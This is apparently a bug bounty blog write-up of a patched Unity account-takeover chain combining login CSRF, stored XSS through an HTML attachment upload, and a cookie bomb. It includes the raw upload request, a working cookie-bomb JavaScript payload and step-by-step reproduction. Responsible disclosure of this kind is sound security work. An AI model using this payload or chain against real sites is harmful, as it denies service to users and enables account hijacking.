Unity : Full Account takeover of Unity Account by chaining Stored XSS and cookie Bomb

-

 Company Information : 



Unity Software Inc. is an American video game software development company based in San Francisco. It was founded in Denmark in 2004 as Over the Edge Entertainment and changed its name in 2007.


Bug Category : 

1.Cookie Bomb : 

A cookie bomb is the capability of adding a large number of large cookies to a user for a domain and its subdomains with the goal that the victim will always send large HTTP requests to the server (due to the cookies) the server won't accept the request. Therefore, this will cause a DoS over a user in that domain and subdomains.
A nice example can be seen in this write-up: https://hackerone.com/reports/57356
And for more information, you can check this presentation:
https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers?slide=26

2.Stored Cross-site-scripting (XSS) :
Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it. 



Target  Information : 

https://unity.com



Technical Details of the Bug : 

I have found multiple vulnerabilities in unity and chaining them together lead to account Takeover.I will describe the each vulnerability separately first and then i will combined them to full account takeover.
1.Login CSRF on Main Login End point : There is No Validation of Conversation ID and Conversation IDs are not associated with user browser session. Which leads to Login CSRF. All the login authentication happens on Unity services Ex: id.unity.com , Connect.unity.com from the API end point and id.unity end point. All the login flow starts with the below URL.
https://id.unity.com/en/conversations/[conversations_id]

In my understanding there is a many requests are exchanging the between api.unity.com and id.unity.com and all the user details like password, social login tokens are getting saved in this conversation_ID. Once conversation_ID have Either Password or social token , then final GET request of conversation_id takes place , which is the final request of logging into the account. If Attacker complete the all flow and send the final request to victim account , victim will be logged in as attacker. This will be useful in the full account takeover. let me know if you don't understand this part specifically .
##2.Stored XSS in connect project attachment : 
 Stored XSS in Connect -- > Project -- > Attachment Upload In the connect -- > project -- > add attachment in content This file upload is vulnerable to Stored XSS attack which will execute on https://connect-prd-cdn.unity.com .
Vulnerable HTTP request : 
POST /api/p/0/attachments HTTP/1.1 2Host: connect.unity.com 3User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:74.0) Gecko/20100101 Firefox/74.0 4Accept: */* 5Accept-Language: en-US,en;q=0.5 6Accept-Encoding: gzip, deflate 7Referer: https://connect.unity.com/ 8X-Requested-With: XMLHttpRequest 9Content-Type: multipart/form-data; boundary=---------------------------3022861621989559703734437534 10Content-Length: 1961 11Origin: https://connect.unity.com 12Connection: close 13Cookie: [Cookies] 14 15-----------------------------3022861621989559703734437534 16Content-Disposition: form-data; name="projectId" 17 18-----------------------------3022861621989559703734437534 19Content-Disposition: form-data; name="offset" 20 210 22-----------------------------3022861621989559703734437534 23Content-Disposition: form-data; name="startBlock" 24 251 26-----------------------------3022861621989559703734437534 27Content-Disposition: form-data; name="uploadId" 28 29 30-----------------------------3022861621989559703734437534 31Content-Disposition: form-data; name="key" 32 33 34-----------------------------3022861621989559703734437534 35Content-Disposition: form-data; name="fileName" 36 37PDF_with_JS_content.pdf 38-----------------------------3022861621989559703734437534 39Content-Disposition: form-data; name="fileType" 40 41application/pdf 42-----------------------------3022861621989559703734437534 43Content-Disposition: form-data; name="size" 44 45655 46-----------------------------3022861621989559703734437534 47Content-Disposition: form-data; name="fromWeb" 48 49true 50-----------------------------3022861621989559703734437534 51Content-Disposition: form-data; name="file"; filename="test.html" 52Content-Type: text/html 53 54content 55-----------------------------3022861621989559703734437534--


Add HTML Content and it will Execute the XSS. Let me know if you have issue with this part .
##3.Cookie Bomb to Deface All Unity services : If you don't know about cookie Bomb . i would like you to read the basics from below talk of filedescriptor.
Link : https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers?slide=38


From subdomain you can add any cookie other subdomains through javascript. If you inject more then 8k length cookies to any domain ,server will not be able to handle it and give you a 400 bad request error message. Adding below JS code will deface all the unity websites. Code :


<html> 2<head> 3</head> 4<body> 5<script> 6var base_domain = document.domain.substr(document.domain.indexOf('.')); 7var pollution = Array(4000).join('a'); 8for(var i=1;i<6;i++){ 9document.cookie='bomb'+i+'='+pollution+';Domain=.unity.com;path=/'; 10} 11</script> 12<h1>Cookie Bomb executed! To remove it clear your cookies.</h1> 13</body> 14</html>


Run this Code with this file upload with HTML extension and run it. Once you run it , All your unity services will show 400 server couldn't fulfil your request . It will deface below services. 1.api.unity.com 2.connect.unity.com 3.id.unity.com 4.assetstore , forum , answers etc.

Combining All together :

1.Attacker go to the login page and generate a new Conversation_ID. Ex : https://id.unity.com/en/conversations/[conversation_ID] 2.Select the Social login and drop the next social login request. 2.Now from Stored XSS on connect , attacker write a cookie bomb script for specific path "en/conversations/" from 2nd and 3rd attack. This will Deface the victim unity services for "en/conversations/" path so victim won't be able to access https://id.unity.com/en/conversations/[conversation_ID] URL. 3.Now you send the social Login request to victim where all the processing victim's token will be added into the conversation_id but the final URL to activate the login( https://id.unity.com/en/conversations/[conversation_ID]) will not work due to cookie bomb. 4.Since Attacker know the conversation_ID , attacker run the final URL to be logged into the victim account . Link : https://id.unity.com/en/conversations/[conversation_ID] 5.Once Attacker is logged in , he will have access to all the services/logins including All unity and Unity3d services as all are connected with api.unity.com and you have control over it. I am able to takeover the account from Normal login(password) also but there will be user interaction where user needs to fill the password. Let me know if you need the POC for that.

Steps To Reproduce:

I am taking an example of One victim account and one attacker account.Take the Facebook connected victim account. I am taking an example of Facebook as Social login. Also create 3rd step cookie bomb script with you which is running on https://connect-prd-cdn.unity.com. 1.From Attacker account go to https://id.unity.com/ and you will be redirected to conversation_ID link. Link : https://id.unity.com/en/conversations/[conversation_ID] 2.click on the Facebook as login and intercept the request. 3.After that request next request will be of facebook oauth. capture it and Drop that request. It will look like below.
https://www.facebook.com/v2.8/dialog/oauth?client_id=1450072528416285&redirect_uri=https://api.unity.com/v1/oauth2/authorize/facebook&response_type=code&scope=email,public_profile&display=page&state=[conversation_ID]


4.Now first run the https://connect-prd-cdn.unity.com URL of cookie bomb and then run above facebook login into the victim browser/account. (3rd and 4th step can be written in same code.) 5.Now run again the first URL with conversation_ID and you will be logged into victim account.

##Video POC :





Impact : 

This is a Unity Main login . All the Unity services are connected to it through Oauth. If Attacker have access to it then he can have access to all the Unity and Unity3d services.



Timeline : 

April 08th 2020: Report send to Unity product Security Team through Hackerone.

April 21th 2020: Report Accepted and Triaged.

April 21th 2020: Complete issue was resolved and confirmed.

June 04th 2020: 3000$ Bounty Rewarded

Comments

Post a Comment

Popular posts from this blog

Account Takeover Apple App Store Connect Account of Any user and Steal Developer API/Subscription Keys of any user(CORS+XSS) worth 8500$

-
Image
Company Information :  Apple Inc. is an American multinational technology company headquartered in Cupertino, California. As of March 2023, Apple is the world's biggest company by market capitalization, and with US$394.3 billion the largest technology company by 2022 revenue. Bug Category :  Cross-origin resource sharing (CORS) : Cross-origin resource sharing (CORS) is a mechanism that allows restricted resources on a web page to be accessed from another domain outside the domain from which the first resource was served. A web page may freely embed cross-origin images, stylesheets, scripts, iframes, and videos. Stored Cross-site-scripting (XSS) : Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it. Impact : 1.Stealing  App Store connect API key with Full Access , Subs...
Read more

Amazon Web Services : Takeover Workbook and delete the Owner on https://builder.honeycode.aws by collaborator user (IDOR) worth 7200$

-
Image
  Company Information :  Amazon Web Services, Inc. is a subsidiary of Amazon that provides on-demand cloud computing platforms and APIs to individuals, companies, and governments, on a metered, pay-as-you-go basis. Clients will often use this in combination with autoscaling. Bug Category :  Insecure direct object reference(IDOR ) :  Insecure direct object reference is a type of access control vulnerability in digital security. This can occur when a web application or application programming interface uses an identifier for direct access to an object in an internal database but does not check for access control or authentication. Target  Information :  https://builder.honeycode.aws/ Technical Details of the Bug :  On https://builder.honeycode.aws you can add workbook and add users as collaborator. collaborator have limited access to the functionalities and sharing part. But there is a way which can lead to collaborator to demote the owner , remove him ...
Read more

UnAuth Access to Twitter Private Tweets and messages Media Content Access(IDOR)

-
Image
Company Info : Twitter is an online news and social networking service where users post and interact with messages, "tweets", restricted to 140 characters. Registered users can post tweets, but those who are unregistered can only read them. Users access Twitter through its website interface, SMS or a mobile device app.Twitter Inc. is based in San Francisco, California, United States, and has more than 25 offices around the world. Bug category : Indirect Object Reference(IDOR) Link : https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References Technical Details of the Bug :  Applications frequently use the actual name or key of an object when generating web pages. Applications don’t always verify the user is authorized for the target object. This results in an insecure direct object reference flaw. Testers can easily manipulate parameter values to detect such flaws. Code analysis quickly shows whether authorization is properly verified. Bug Des...
Read more